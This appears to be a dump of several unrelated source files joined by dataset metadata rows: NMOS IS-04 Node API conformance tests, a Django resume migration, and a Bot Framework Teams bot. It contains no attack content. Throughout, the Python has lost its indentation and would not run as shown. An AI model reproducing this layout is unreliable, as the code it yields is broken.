if "api_auth" not in properties:
return test.FAIL("No 'api_auth' TXT record found in Node API advertisement.")
elif not isinstance(properties["api_auth"], bool):
# zeroconf translates 'true' to True and 'false' to False automatically
return test.FAIL("API authorization ('api_auth') TXT record is not one of 'true' or 'false'.")
return test.PASS()
return test.WARNING("No matching mDNS announcement found for Node with IP/Port {}:{}. This will not affect "
"operation in registered mode but may indicate a lack of support for peer to peer "
"operation.".format(api["ip"], api["port"]),
NMOS_WIKI_URL + "/IS-04#nodes-peer-to-peer-mode")
def test_12_01(self, test):
"""Node does not advertise a Node type mDNS announcement in the presence of a Registration API (v1.3+)"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.3") < 0:
return test.DISABLED("This test is disabled for Nodes < v1.3")
node_list = self.collect_mdns_announcements()
for node in node_list:
address = socket.inet_ntoa(node.address)
port = node.port
if address == api["ip"] and port == api["port"]:
properties = self.convert_bytes(node.properties)
if "api_ver" not in properties:
return test.FAIL("No 'api_ver' TXT record found in Node API advertisement.")
min_version_lt_v1_3 = False
for api_version in properties["api_ver"].split(","):
if self.is04_utils.compare_api_version(api_version, "v1.3") < 0:
min_version_lt_v1_3 = True
if not min_version_lt_v1_3:
return test.WARNING("Nodes which support v1.3+ only should not advertise via mDNS when in "
"registered mode.")
return test.PASS()
def test_13(self, test):
"""PUTing to a Receiver target resource with a Sender resource payload is accepted
and connects the Receiver to a stream"""
valid, receivers = self.do_request("GET", self.node_url + "receivers")
if not valid or receivers.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(receivers))
try:
formats_tested = []
for receiver in receivers.json():
if not receiver["transport"].startswith("urn:x-nmos:transport:rtp"):
continue
try:
stream_type = receiver["format"].split(":")[-1]
except TypeError:
return test.FAIL("Unexpected Receiver format: {}".format(receiver))
# Test each available receiver format once
if stream_type in formats_tested:
continue
if stream_type not in ["video", "audio", "data", "mux"]:
return test.FAIL("Unexpected Receiver format: {}".format(receiver["format"]))
request_data = self.node.get_sender(stream_type)
self.do_receiver_put(test, receiver["id"], request_data)
time.sleep(CONFIG.API_PROCESSING_TIMEOUT)
valid, response = self.do_request("GET", self.node_url + "receivers/" + receiver["id"])
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(receiver))
receiver = response.json()
if receiver["subscription"]["sender_id"] != request_data["id"]:
return test.FAIL("Node API Receiver {} subscription does not reflect the subscribed "
"Sender ID".format(receiver["id"]))
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.2") >= 0:
if not receiver["subscription"]["active"]:
return test.FAIL("Node API Receiver {} subscription does not indicate an active "
"subscription".format(receiver["id"]))
formats_tested.append(stream_type)
if len(formats_tested) > 0:
return test.PASS()
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.UNCLEAR("Node API does not expose any RTP Receivers")
def test_14(self, test):
"""PUTing to a Receiver target resource with an empty JSON object payload is accepted and
disconnects the Receiver from a stream"""
valid, receivers = self.do_request("GET", self.node_url + "receivers")
if not valid or receivers.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(receivers))
try:
test_receiver = None
for receiver in receivers.json():
if not receiver["transport"].startswith("urn:x-nmos:transport:rtp"):
continue
test_receiver = receiver
break
if test_receiver is not None:
self.do_receiver_put(test, test_receiver["id"], {})
time.sleep(CONFIG.API_PROCESSING_TIMEOUT)
valid, response = self.do_request("GET", self.node_url + "receivers/" + test_receiver["id"])
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(test_receiver))
receiver = response.json()
if receiver["subscription"]["sender_id"] is not None:
return test.FAIL("Node API Receiver {} subscription does not reflect the subscribed "
"Sender ID".format(receiver["id"]))
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.2") >= 0:
if receiver["subscription"]["active"]:
return test.FAIL("Node API Receiver {} subscription does not indicate an inactive "
"subscription".format(receiver["id"]))
return test.PASS()
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.UNCLEAR("Node API does not expose any RTP Receivers")
def test_15(self, test):
"""Node correctly selects a Registration API based on advertised priorities"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
last_hb = None
last_registry = None
# All but the first and last registry can be used for priority tests. The last one is reserved for timeout tests
for index, registry_data in enumerate(self.registry_basics_data[1:-1]):
if len(registry_data.heartbeats) < 1:
return test.FAIL("Node never made contact with registry {} advertised on port {}"
.format(index + 1, registry_data.port))
first_hb_to_registry = registry_data.heartbeats[0]
if last_hb:
if first_hb_to_registry < last_hb:
return test.FAIL("Node sent a heartbeat to the registry on port {} before the registry on port {}, "
"despite their priorities requiring the opposite behaviour"
.format(registry_data.port, last_registry.port))
last_hb = first_hb_to_registry
last_registry = registry_data
return test.PASS()
def test_16(self, test):
"""Node correctly fails over between advertised Registration APIs when one fails"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
# All but the first and last registry can be used for failover tests. The last one is reserved for timeout tests
for index, registry_data in enumerate(self.registry_basics_data[1:-1]):
if len(registry_data.heartbeats) < 1:
return test.FAIL("Node never made contact with registry {} advertised on port {}"
.format(index + 1, registry_data.port))
if index > 0:
for resource in registry_data.posts:
if resource[1]["payload"]["type"] == "node":
return test.FAIL("Node re-registered its resources when it failed over to a new registry, when "
"it should only have issued a heartbeat")
return test.PASS()
def test_16_01(self, test):
"""Node correctly handles Registration APIs whose connections time out"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
self.do_registry_basics_prereqs()
# The second to last registry will intentionally cause a timeout. Check here that the Node successfully times
# out its attempted connection within a heartbeat period and then registers with the next available one.
registry_data = self.registry_basics_data[-1]
if len(registry_data.heartbeats) < 1:
return test.WARNING("Node never made contact with registry {} advertised on port {}"
.format(len(self.registry_basics_data), registry_data.port))
for resource in registry_data.posts:
if resource[1]["payload"]["type"] == "node":
return test.WARNING("Node re-registered its resources when it failed over to a new registry, when it "
"should only have issued a heartbeat")
return test.PASS()
def test_17(self, test):
"""All Node resources use different UUIDs"""
uuids = set()
valid, response = self.do_request("GET", self.node_url + "self")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
uuids.add(response.json()["id"])
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
for resource_type in ["devices", "sources", "flows", "senders", "receivers"]:
valid, response = self.do_request("GET", self.node_url + resource_type)
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for resource in response.json():
if resource["id"] in uuids:
return test.FAIL("Duplicate ID '{}' found in Node API '{}' resource".format(resource["id"],
resource_type))
uuids.add(resource["id"])
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.PASS()
def test_17_01(self, test):
"""All Devices refer to their attached Senders and Receivers"""
# store references from Devices to Senders and Receivers
from_devices = {}
# store references to Devices from Senders and Receivers
to_devices = {}
# get all the Node's Devices
valid, response = self.do_request("GET", self.node_url + "devices")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for resource in response.json():
from_devices[resource["id"]] = {
"senders": set(resource["senders"]),
"receivers": set(resource["receivers"])
}
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
if len(from_devices) == 0:
return test.UNCLEAR("Node API does not expose any Devices")
# get all the Node's Senders and Receivers
empty_refs = {"senders": set(), "receivers": set()}
for resource_type in ["senders", "receivers"]:
valid, response = self.do_request("GET", self.node_url + resource_type)
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for resource in response.json():
id = resource["device_id"]
if id not in to_devices:
to_devices[id] = deepcopy(empty_refs)
to_devices[id][resource_type].add(resource["id"])
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
found_empty_refs = False
for id, from_device in from_devices.items():
if id not in to_devices:
if from_device == empty_refs:
# no Senders or Receivers are attached to this Device
continue
else:
return test.FAIL("Device '{}' references one or more unknown Senders or Receivers."
.format(id))
to_device = to_devices[id]
if from_device == empty_refs:
# Device appears not to be populating the deprecated attributes
found_empty_refs = True
else:
for refs in ["senders", "receivers"]:
if len(from_device[refs] - to_device[refs]) > 0:
return test.FAIL("Device '{}' references one or more unknown {}."
.format(id, refs.title()))
elif len(to_device[refs] - from_device[refs]) > 0:
return test.FAIL("Device '{}' does not have a reference to one or more of its {}."
.format(id, refs.title()))
# else: references from Device to its Senders and Receivers
# match references from Senders and Receivers to that Device
if found_empty_refs:
return test.WARNING("One or more Devices do not have references to any of their Senders or Receivers. "
"(The 'senders' and 'receivers' attributes are deprecated since IS-04 v1.2.)")
return test.PASS()
def test_18(self, test):
"""All Node clocks are unique, and relate to any visible Sources' clocks"""
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.1") < 0:
return test.NA("Clocks are not available until IS-04 v1.1")
clocks = set()
valid, response = self.do_request("GET", self.node_url + "self")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for clock in response.json()["clocks"]:
clock_name = clock["name"]
if clock_name in clocks:
return test.FAIL("Duplicate clock name '{}' found in Node API self resource".format(clock_name))
clocks.add(clock_name)
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
valid, response = self.do_request("GET", self.node_url + "sources")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for source in response.json():
clock_name = source["clock_name"]
if clock_name not in clocks and clock_name is not None:
return test.FAIL("Source '{}' uses a non-existent clock name '{}'".format(source["id"], clock_name))
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.PASS()
def test_19(self, test):
"""All Node interfaces are unique, and relate to any visible Senders and Receivers' interface_bindings"""
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.2") < 0:
return test.NA("Interfaces are not available until IS-04 v1.2")
interfaces = set()
valid, response = self.do_request("GET", self.node_url + "self")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for interface in response.json()["interfaces"]:
interface_name = interface["name"]
if interface_name in interfaces:
return test.FAIL("Duplicate interface name '{}' found in Node API self resource"
.format(interface_name))
interfaces.add(interface_name)
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
valid, response = self.do_request("GET", self.node_url + "senders")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for sender in response.json():
interface_bindings = sender["interface_bindings"]
for interface_name in interface_bindings:
if interface_name not in interfaces:
return test.FAIL("Sender '{}' uses a non-existent interface name '{}'"
.format(sender["id"], interface_name))
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
valid, response = self.do_request("GET", self.node_url + "receivers")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
for receiver in response.json():
interface_bindings = receiver["interface_bindings"]
for interface_name in interface_bindings:
if interface_name not in interfaces:
return test.FAIL("Receiver '{}' uses a non-existent interface name '{}'"
.format(receiver["id"], interface_name))
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.PASS()
def test_20(self, test):
"""Node's resources correctly signal the current protocol and IP/hostname"""
found_api_endpoint = False
found_href = False
href_hostname_warn = False
api_endpoint_host_warn = False
service_href_scheme_warn = False
service_href_hostname_warn = False
control_href_scheme_warn = False
control_href_hostname_warn = False
manifest_href_scheme_warn = False
manifest_href_hostname_warn = False
api = self.apis[NODE_API_KEY]
valid, response = self.do_request("GET", self.node_url + "self")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
node_self = response.json()
if not node_self["href"].startswith(self.protocol + "://"):
return test.FAIL("Node 'href' does not match the current protocol")
if node_self["href"].startswith("https://") and urlparse(node_self["href"]).hostname[-1].isdigit():
href_hostname_warn = True
if self.is04_utils.compare_api_version(api["version"], "v1.1") >= 0:
for endpoint in node_self["api"]["endpoints"]:
if endpoint["protocol"] != self.protocol:
return test.FAIL("One or more Node 'api.endpoints' do not match the current protocol")
if endpoint["host"] == api["hostname"] and endpoint["port"] == api["port"]:
found_api_endpoint = True
if self.is04_utils.compare_urls(node_self["href"], "{}://{}:{}"
.format(endpoint["protocol"], endpoint["host"], endpoint["port"])):
found_href = True
if endpoint["protocol"] == "https" and endpoint["host"][-1].isdigit():
api_endpoint_host_warn = True
for service in node_self["services"]:
href = service["href"]
if href.startswith("http") and not href.startswith(self.protocol + "://"):
# Only warn about these at the end so that more major failures are flagged first
# Protocols other than HTTP may be used, so don't incorrectly flag those too
service_href_scheme_warn = True
if href.startswith("https://") and urlparse(href).hostname[-1].isdigit():
service_href_hostname_warn = True
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
if self.is04_utils.compare_api_version(api["version"], "v1.1") >= 0:
if not found_api_endpoint:
return test.FAIL("None of the Node 'api.endpoints' match the current protocol, IP/hostname and port")
if not found_href:
return test.FAIL("None of the Node 'api.endpoints' match the Node 'href'")
valid, response = self.do_request("GET", self.node_url + "devices")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
node_devices = response.json()
for device in node_devices:
for control in device["controls"]:
href = control["href"]
if href.startswith("http") and not href.startswith(self.protocol + "://"):
# Only warn about these at the end so that more major failures are flagged first
# Protocols other than HTTP may be used, so don't incorrectly flag those too
control_href_scheme_warn = True
if href.startswith("https://") and urlparse(href).hostname[-1].isdigit():
control_href_hostname_warn = True
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
valid, response = self.do_request("GET", self.node_url + "senders")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
node_senders = response.json()
for sender in node_senders:
href = sender["manifest_href"]
if href is not None and href.startswith("http") and not href.startswith(self.protocol + "://"):
manifest_href_scheme_warn = True
if href is not None and href.startswith("https://") and urlparse(href).hostname[-1].isdigit():
manifest_href_hostname_warn = True
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
if href_hostname_warn:
return test.WARNING("Node 'href' value has an IP address not a hostname")
elif api_endpoint_host_warn:
return test.WARNING("One or more Node 'api.endpoints.host' values are an IP address not a hostname")
elif service_href_hostname_warn:
return test.WARNING("One or more Node service 'href' values have an IP address not a hostname")
elif control_href_hostname_warn:
return test.WARNING("One or more Device control 'href' values have an IP address not a hostname")
elif manifest_href_hostname_warn:
return test.WARNING("One or more Sender 'manifest_href' values have an IP address not a hostname")
elif service_href_scheme_warn:
return test.WARNING("One or more Node service 'href' values do not match the current protocol")
elif control_href_scheme_warn:
return test.WARNING("One or more Device control 'href' values do not match the current protocol")
elif manifest_href_scheme_warn:
return test.WARNING("One or more Sender 'manifest_href' values do not match the current protocol")
return test.PASS()
def test_21(self, test):
"""Node correctly interprets a 200 code from a registry upon initial registration"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
registry_info = self._registry_mdns_info(self.primary_registry.get_data().port, 0)
# Reset the registry to clear previous heartbeats, and enable in 200 test mode
self.primary_registry.reset()
self.primary_registry.enable(first_reg=True)
if CONFIG.DNS_SD_MODE == "multicast":
# Advertise a registry at pri 0 and allow the Node to do a basic registration
self.zc.register_service(registry_info)
# Wait for n seconds after advertising the service for the first POST and then DELETE from a Node
self.primary_registry.wait_for_registration(CONFIG.DNS_SD_ADVERT_TIMEOUT)
self.primary_registry.wait_for_delete(CONFIG.HEARTBEAT_INTERVAL + 1)
# Wait for the Node to finish its interactions
while (time.time() - self.primary_registry.last_time) < CONFIG.HEARTBEAT_INTERVAL + 1:
time.sleep(0.2)
# By this point we should have had at least one Node POST and a corresponding DELETE
if CONFIG.DNS_SD_MODE == "multicast":
self.zc.unregister_service(registry_info)
self.primary_registry.disable()
# Get the relevant Node ID
url = "{}self".format(self.node_url)
valid, r = self.do_request("GET", url)
if valid and r.status_code == 200:
try:
# Check that a POST and DELETE match the Node's ID
node_id = r.json()["id"]
found_post = False
for resource in self.primary_registry.get_data().posts:
if resource[1]["payload"]["type"] == "node" and resource[1]["payload"]["data"]["id"] == node_id:
found_post = True
if not found_post:
return test.FAIL("Node did not attempt to make contact with the registry")
found_delete = False
found_extra_deletes = False
for resource in self.primary_registry.get_data().deletes:
if resource[1]["type"] == "node" and resource[1]["id"] == node_id:
found_delete = True
elif resource[1]["type"] != "node":
found_extra_deletes = True
if not found_delete:
return test.FAIL("Node did not attempt to DELETE itself having encountered a 200 code on initial "
"registration")
elif found_extra_deletes:
return test.WARNING("Node DELETEd more than just its 'node' resource. This is unnecessary when "
"encountering a 200 code on initial registration")
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
else:
return test.FAIL("Unexpected responses from Node API self resource")
return test.PASS()
def test_22(self, test):
"""Node resource IDs persist over a reboot"""
return test.MANUAL("This check must be performed manually, or via use of the following tool",
"https://github.com/AMWA-TV/nmos-testing/blob/master/utilities/uuid-checker/README.md")
def test_23(self, test):
"""Senders and Receivers correctly use BCP-002-01 grouping syntax"""
found_groups = False
found_senders_receivers = False
groups = {"node": {}, "device": {}}
for resource_name in ["senders", "receivers"]:
valid, response = self.do_request("GET", self.node_url + resource_name)
if valid and response.status_code == 200:
try:
for resource in response.json():
found_senders_receivers = True
if resource["device_id"] not in groups["device"]:
groups["device"][resource["device_id"]] = {}
for tag_name, tag_value in resource["tags"].items():
if tag_name != "urn:x-nmos:tag:grouphint/v1.0":
continue
if not isinstance(tag_value, list) or len(tag_value) == 0:
return test.FAIL("Group tag for {} {} is not an array or has too few items"
.format(resource_name.capitalize().rstrip("s"), resource["id"]))
found_groups = True
for group_def in tag_value:
group_params = group_def.split(":")
group_scope = "device"
# Perform basic validation on the group syntax
if len(group_params) < 2:
return test.FAIL("Group syntax for {} {} has too few parameters"
.format(resource_name.capitalize().rstrip("s"), resource["id"]))
elif len(group_params) > 3:
return test.FAIL("Group syntax for {} {} has too many parameters"
.format(resource_name.capitalize().rstrip("s"), resource["id"]))
elif len(group_params) == 3:
if group_params[2] not in ["device", "node"]:
return test.FAIL("Group syntax for {} {} uses an invalid group scope: {}"
.format(resource_name.capitalize().rstrip("s"), resource["id"],
group_params[2]))
group_scope = group_params[2]
# Ensure we have a reference to the group name stored
if group_scope == "node":
if group_params[0] not in groups["node"]:
groups["node"][group_params[0]] = {}
group_ref = groups["node"][group_params[0]]
elif group_scope == "device":
if group_params[0] not in groups["device"][resource["device_id"]]:
groups["device"][resource["device_id"]][group_params[0]] = {}
group_ref = groups["device"][resource["device_id"]][group_params[0]]
# Check for duplicate roles within groups
if group_params[1] in group_ref:
return test.FAIL("Duplicate role found in group {} for resources {} and {}"
.format(group_params[0], resource["id"],
group_ref[group_params[1]]))
else:
group_ref[group_params[1]] = resource["id"]
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
if not found_senders_receivers:
return test.UNCLEAR("No Sender or Receiver resources were found on the Node")
elif found_groups:
return test.PASS()
else:
return test.OPTIONAL("No BCP-002-01 groups were identified in Sender or Receiver tags",
"https://amwa-tv.github.io/nmos-grouping/best-practice-natural-grouping.html")
def test_24(self, test):
"""Periodic Sources specify a 'grain_rate'"""
valid, response = self.do_request("GET", self.node_url + "sources")
if valid and response.status_code == 200:
try:
for resource in response.json():
# Currently testing where it would be particularly unusual to find a non-periodic Source
if resource["format"] in ["urn:x-nmos:format:video",
"urn:x-nmos:format:audio",
"urn:x-nmos:format:mux"]:
if "grain_rate" not in resource:
return test.WARNING("Sources MUST specify a 'grain_rate' if they are periodic")
if len(response.json()) > 0:
return test.PASS()
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.UNCLEAR("No Source resources were found on the Node")
def test_24_01(self, test):
"""Periodic Flows' 'grain_rate' is divisible by their parent Source 'grain_rate'"""
source_valid, source_response = self.do_request("GET", self.node_url + "sources")
flow_valid, flow_response = self.do_request("GET", self.node_url + "flows")
if source_valid and flow_valid and source_response.status_code == 200 and flow_response.status_code == 200:
try:
sources = {source["id"]: source for source in source_response.json()}
flows = flow_response.json()
for flow in flows:
if "grain_rate" in flow:
source = sources[flow["source_id"]]
if "grain_rate" not in source:
return test.FAIL("Sources MUST specify a 'grain_rate' when their child Flows specify a "
"'grain_rate'")
flow_rate = flow["grain_rate"]
if "denominator" not in flow_rate:
flow_rate["denominator"] = 1
source_rate = source["grain_rate"]
if "denominator" not in source_rate:
source_rate["denominator"] = 1
if ((source_rate["numerator"] * flow_rate["denominator"]) %
(flow_rate["numerator"] * source_rate["denominator"])):
return test.FAIL("Flow 'grain_rate' MUST be integer divisible by the Source 'grain_rate'")
elif flow["format"] in ["urn:x-nmos:format:video",
"urn:x-nmos:format:audio",
"urn:x-nmos:format:mux"]:
return test.WARNING("Flows SHOULD specify a 'grain_rate' if they are periodic")
if len(flow_response.json()) > 0:
return test.PASS()
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
except KeyError:
return test.FAIL("No Source found for one or more advertised Flows")
return test.UNCLEAR("No Source or Flow resources were found on the Node")
def test_25(self, test):
"""Receivers expose expected 'caps' for their API version"""
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.1") < 0:
return test.NA("Capabilities are not used before API v1.1")
receivers_valid, receivers_response = self.do_request("GET", self.node_url + "receivers")
no_receivers = True
if receivers_valid and receivers_response.status_code == 200:
try:
for receiver in receivers_response.json():
no_receivers = False
if "media_types" not in receiver["caps"]:
return test.WARNING("Receiver 'caps' should include a list of accepted 'media_types', unless "
"this Receiver can handle any 'media_type'",
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}/docs/"
"4.3._Behaviour_-_Nodes.html#all-resources".format(api["spec_branch"]))
if self.is04_utils.compare_api_version(api["version"], "v1.3") >= 0:
if receiver["format"] == "urn:x-nmos:format:data" and \
receiver["transport"] in ["urn:x-nmos:transport:websocket", "urn:x-nmos:transport:mqtt"]:
# Technically this is a bit IS-07 specific, but it may still be best placed here for now
if "event_types" not in receiver["caps"]:
return test.WARNING("Receiver 'caps' should include a list of accepted 'event_types' "
"if the Receiver accepts IS-07 events, unless this Receiver can "
"handle any 'event_type'",
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}/"
"docs/4.3._Behaviour_-_Nodes.html#all-resources"
.format(api["spec_branch"]))
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
except KeyError as e:
return test.FAIL("Unable to find expected key in the Receiver: {}".format(e))
if no_receivers:
return test.UNCLEAR("No Receivers were found on the Node")
else:
return test.PASS()
def do_receiver_put(self, test, receiver_id, data):
"""Perform a PUT to the Receiver 'target' resource with the specified data"""
valid, put_response = self.do_request("PUT", self.node_url + "receivers/" + receiver_id + "/target", json=data)
if not valid:
raise NMOSTestException(test.FAIL("Unexpected response from the Node API: {}".format(put_response)))
if put_response.status_code == 501:
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.3") >= 0:
raise NMOSTestException(test.OPTIONAL("Node indicated that basic connection management is not "
"supported",
NMOS_WIKI_URL + "/IS-04#nodes-basic-connection-management"))
else:
raise NMOSTestException(test.WARNING("501 'Not Implemented' status code is not supported below API "
"version v1.3",
NMOS_WIKI_URL + "/IS-04#nodes-basic-connection-management"))
elif put_response.status_code != 202:
raise NMOSTestException(test.FAIL("Receiver target PUT did not produce a 202 response code: "
"{}".format(put_response.status_code)))
schema = self.get_schema(NODE_API_KEY, "PUT", "/receivers/{receiverId}/target", put_response.status_code)
valid, message = self.check_response(schema, "PUT", put_response)
if valid:
# if message:
# return WARNING somehow...
pass
else:
raise NMOSTestException(test.FAIL(message))
def collect_mdns_announcements(self):
"""Helper function to collect Node mDNS announcements in the presence of a Registration API"""
registry_info = self._registry_mdns_info(self.primary_registry.get_data().port, 0)
# Reset the registry to clear previous data, although we won't be checking it
self.primary_registry.reset()
self.primary_registry.enable()
if CONFIG.DNS_SD_MODE == "multicast":
# Advertise a registry at pri 0 and allow the Node to do a basic registration
self.zc.register_service(registry_info)
# Wait for n seconds after advertising the service for the first POST from a Node
self.primary_registry.wait_for_registration(CONFIG.DNS_SD_ADVERT_TIMEOUT)
ServiceBrowser(self.zc, "_nmos-node._tcp.local.", self.zc_listener)
time.sleep(CONFIG.DNS_SD_BROWSE_TIMEOUT)
node_list = self.zc_listener.get_service_list()
# Withdraw the registry advertisement now we've performed a browse for Node advertisements
if CONFIG.DNS_SD_MODE == "multicast":
self.zc.unregister_service(registry_info)
self.primary_registry.disable()
return node_list
| 50.211602 | 121 | 0.571504 |
04e8335e7c4ecd6f61510a1f43c23bb7884dee16
| 1,296 |
py
|
Python
|
fuzzybee/resume/migrations/0001_initial.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
fuzzybee/resume/migrations/0001_initial.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
fuzzybee/resume/migrations/0001_initial.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('joboard', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Resume',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('identity_image', models.ImageField(upload_to=b'identity')),
('name', models.CharField(max_length=24, blank=True)),
('gender', models.CharField(max_length=4)),
('birthday', models.CharField(max_length=24)),
('experience', models.CharField(max_length=24)),
('education', models.CharField(max_length=24)),
('phone', models.CharField(max_length=24)),
('apply_job', models.CharField(max_length=24)),
('expect_salary', models.CharField(max_length=24)),
('self_description', models.CharField(max_length=100)),
('apply_factory', models.ForeignKey(related_name='factory', to='joboard.Factory')),
],
options={
},
bases=(models.Model,),
),
]
| 37.028571 | 114 | 0.566358 |
9f6ce6a4b7bd25e45daed898600f34939f3e44c9
| 3,045 |
py
|
Python
|
samples/python/54.teams-task-module/app.py
|
kenguil/BF4
|
5954f40f30c71a38c5f1550db50d19b2a9c2427d
|
[
"MIT"
] | 1 |
2020-10-30T16:44:04.000Z
|
2020-10-30T16:44:04.000Z
|
samples/python/54.teams-task-module/app.py
|
kenguil/BF4
|
5954f40f30c71a38c5f1550db50d19b2a9c2427d
|
[
"MIT"
] | null | null | null |
samples/python/54.teams-task-module/app.py
|
kenguil/BF4
|
5954f40f30c71a38c5f1550db50d19b2a9c2427d
|
[
"MIT"
] | 1 |
2020-07-30T11:34:14.000Z
|
2020-07-30T11:34:14.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import sys
import traceback
from datetime import datetime
from http import HTTPStatus
from aiohttp import web
from aiohttp.web import Request, Response, json_response
from botbuilder.core import (
BotFrameworkAdapterSettings,
TurnContext,
BotFrameworkAdapter,
)
from botbuilder.core.integration import aiohttp_error_middleware
from botbuilder.schema import Activity, ActivityTypes
from bots import TeamsTaskModuleBot
from config import DefaultConfig
CONFIG = DefaultConfig()
# Create adapter.
# See https://aka.ms/about-bot-adapter to learn more about how bots work.
SETTINGS = BotFrameworkAdapterSettings(CONFIG.APP_ID, CONFIG.APP_PASSWORD)
ADAPTER = BotFrameworkAdapter(SETTINGS)
# Catch-all for errors.
async def on_error(context: TurnContext, error: Exception):
# This check writes out errors to console log .vs. app insights.
# NOTE: In production environment, you should consider logging this to Azure
# application insights.
print(f"\n [on_turn_error] unhandled error: {error}", file=sys.stderr)
traceback.print_exc()
# Send a message to the user
await context.send_activity("The bot encountered an error or bug.")
await context.send_activity(
"To continue to run this bot, please fix the bot source code."
)
# Send a trace activity if we're talking to the Bot Framework Emulator
if context.activity.channel_id == "emulator":
# Create a trace activity that contains the error object
trace_activity = Activity(
label="TurnError",
name="on_turn_error Trace",
timestamp=datetime.utcnow(),
type=ActivityTypes.trace,
value=f"{error}",
value_type="https://www.botframework.com/schemas/error",
)
# Send a trace activity, which will be displayed in Bot Framework Emulator
await context.send_activity(trace_activity)
ADAPTER.on_turn_error = on_error
# Create the Bot
BOT = TeamsTaskModuleBot()
# Listen for incoming requests on /api/messages
async def messages(req: Request) -> Response:
# Main bot message handler.
if "application/json" in req.headers["Content-Type"]:
body = await req.json()
else:
return Response(status=HTTPStatus.UNSUPPORTED_MEDIA_TYPE)
activity = Activity().deserialize(body)
auth_header = req.headers["Authorization"] if "Authorization" in req.headers else ""
invoke_response = await ADAPTER.process_activity(
activity, auth_header, BOT.on_turn
)
if invoke_response:
return json_response(
data=invoke_response.body, status=invoke_response.status
)
return Response(status=HTTPStatus.OK)
APP = web.Application(middlewares=[aiohttp_error_middleware])
APP.router.add_post("/api/messages", messages)
if __name__ == "__main__":
try:
web.run_app(APP, host="localhost", port=CONFIG.PORT)
except Exception as error:
raise error
| 33.097826 | 88 | 0.718883 |
f5816f4dd90979298aa30fa2d4f097cf2bd2096e
| 797 |
py
|
Python
|
xlsxwriter/test/comparison/test_image24.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | 1 |
2020-07-01T07:24:37.000Z
|
2020-07-01T07:24:37.000Z
|
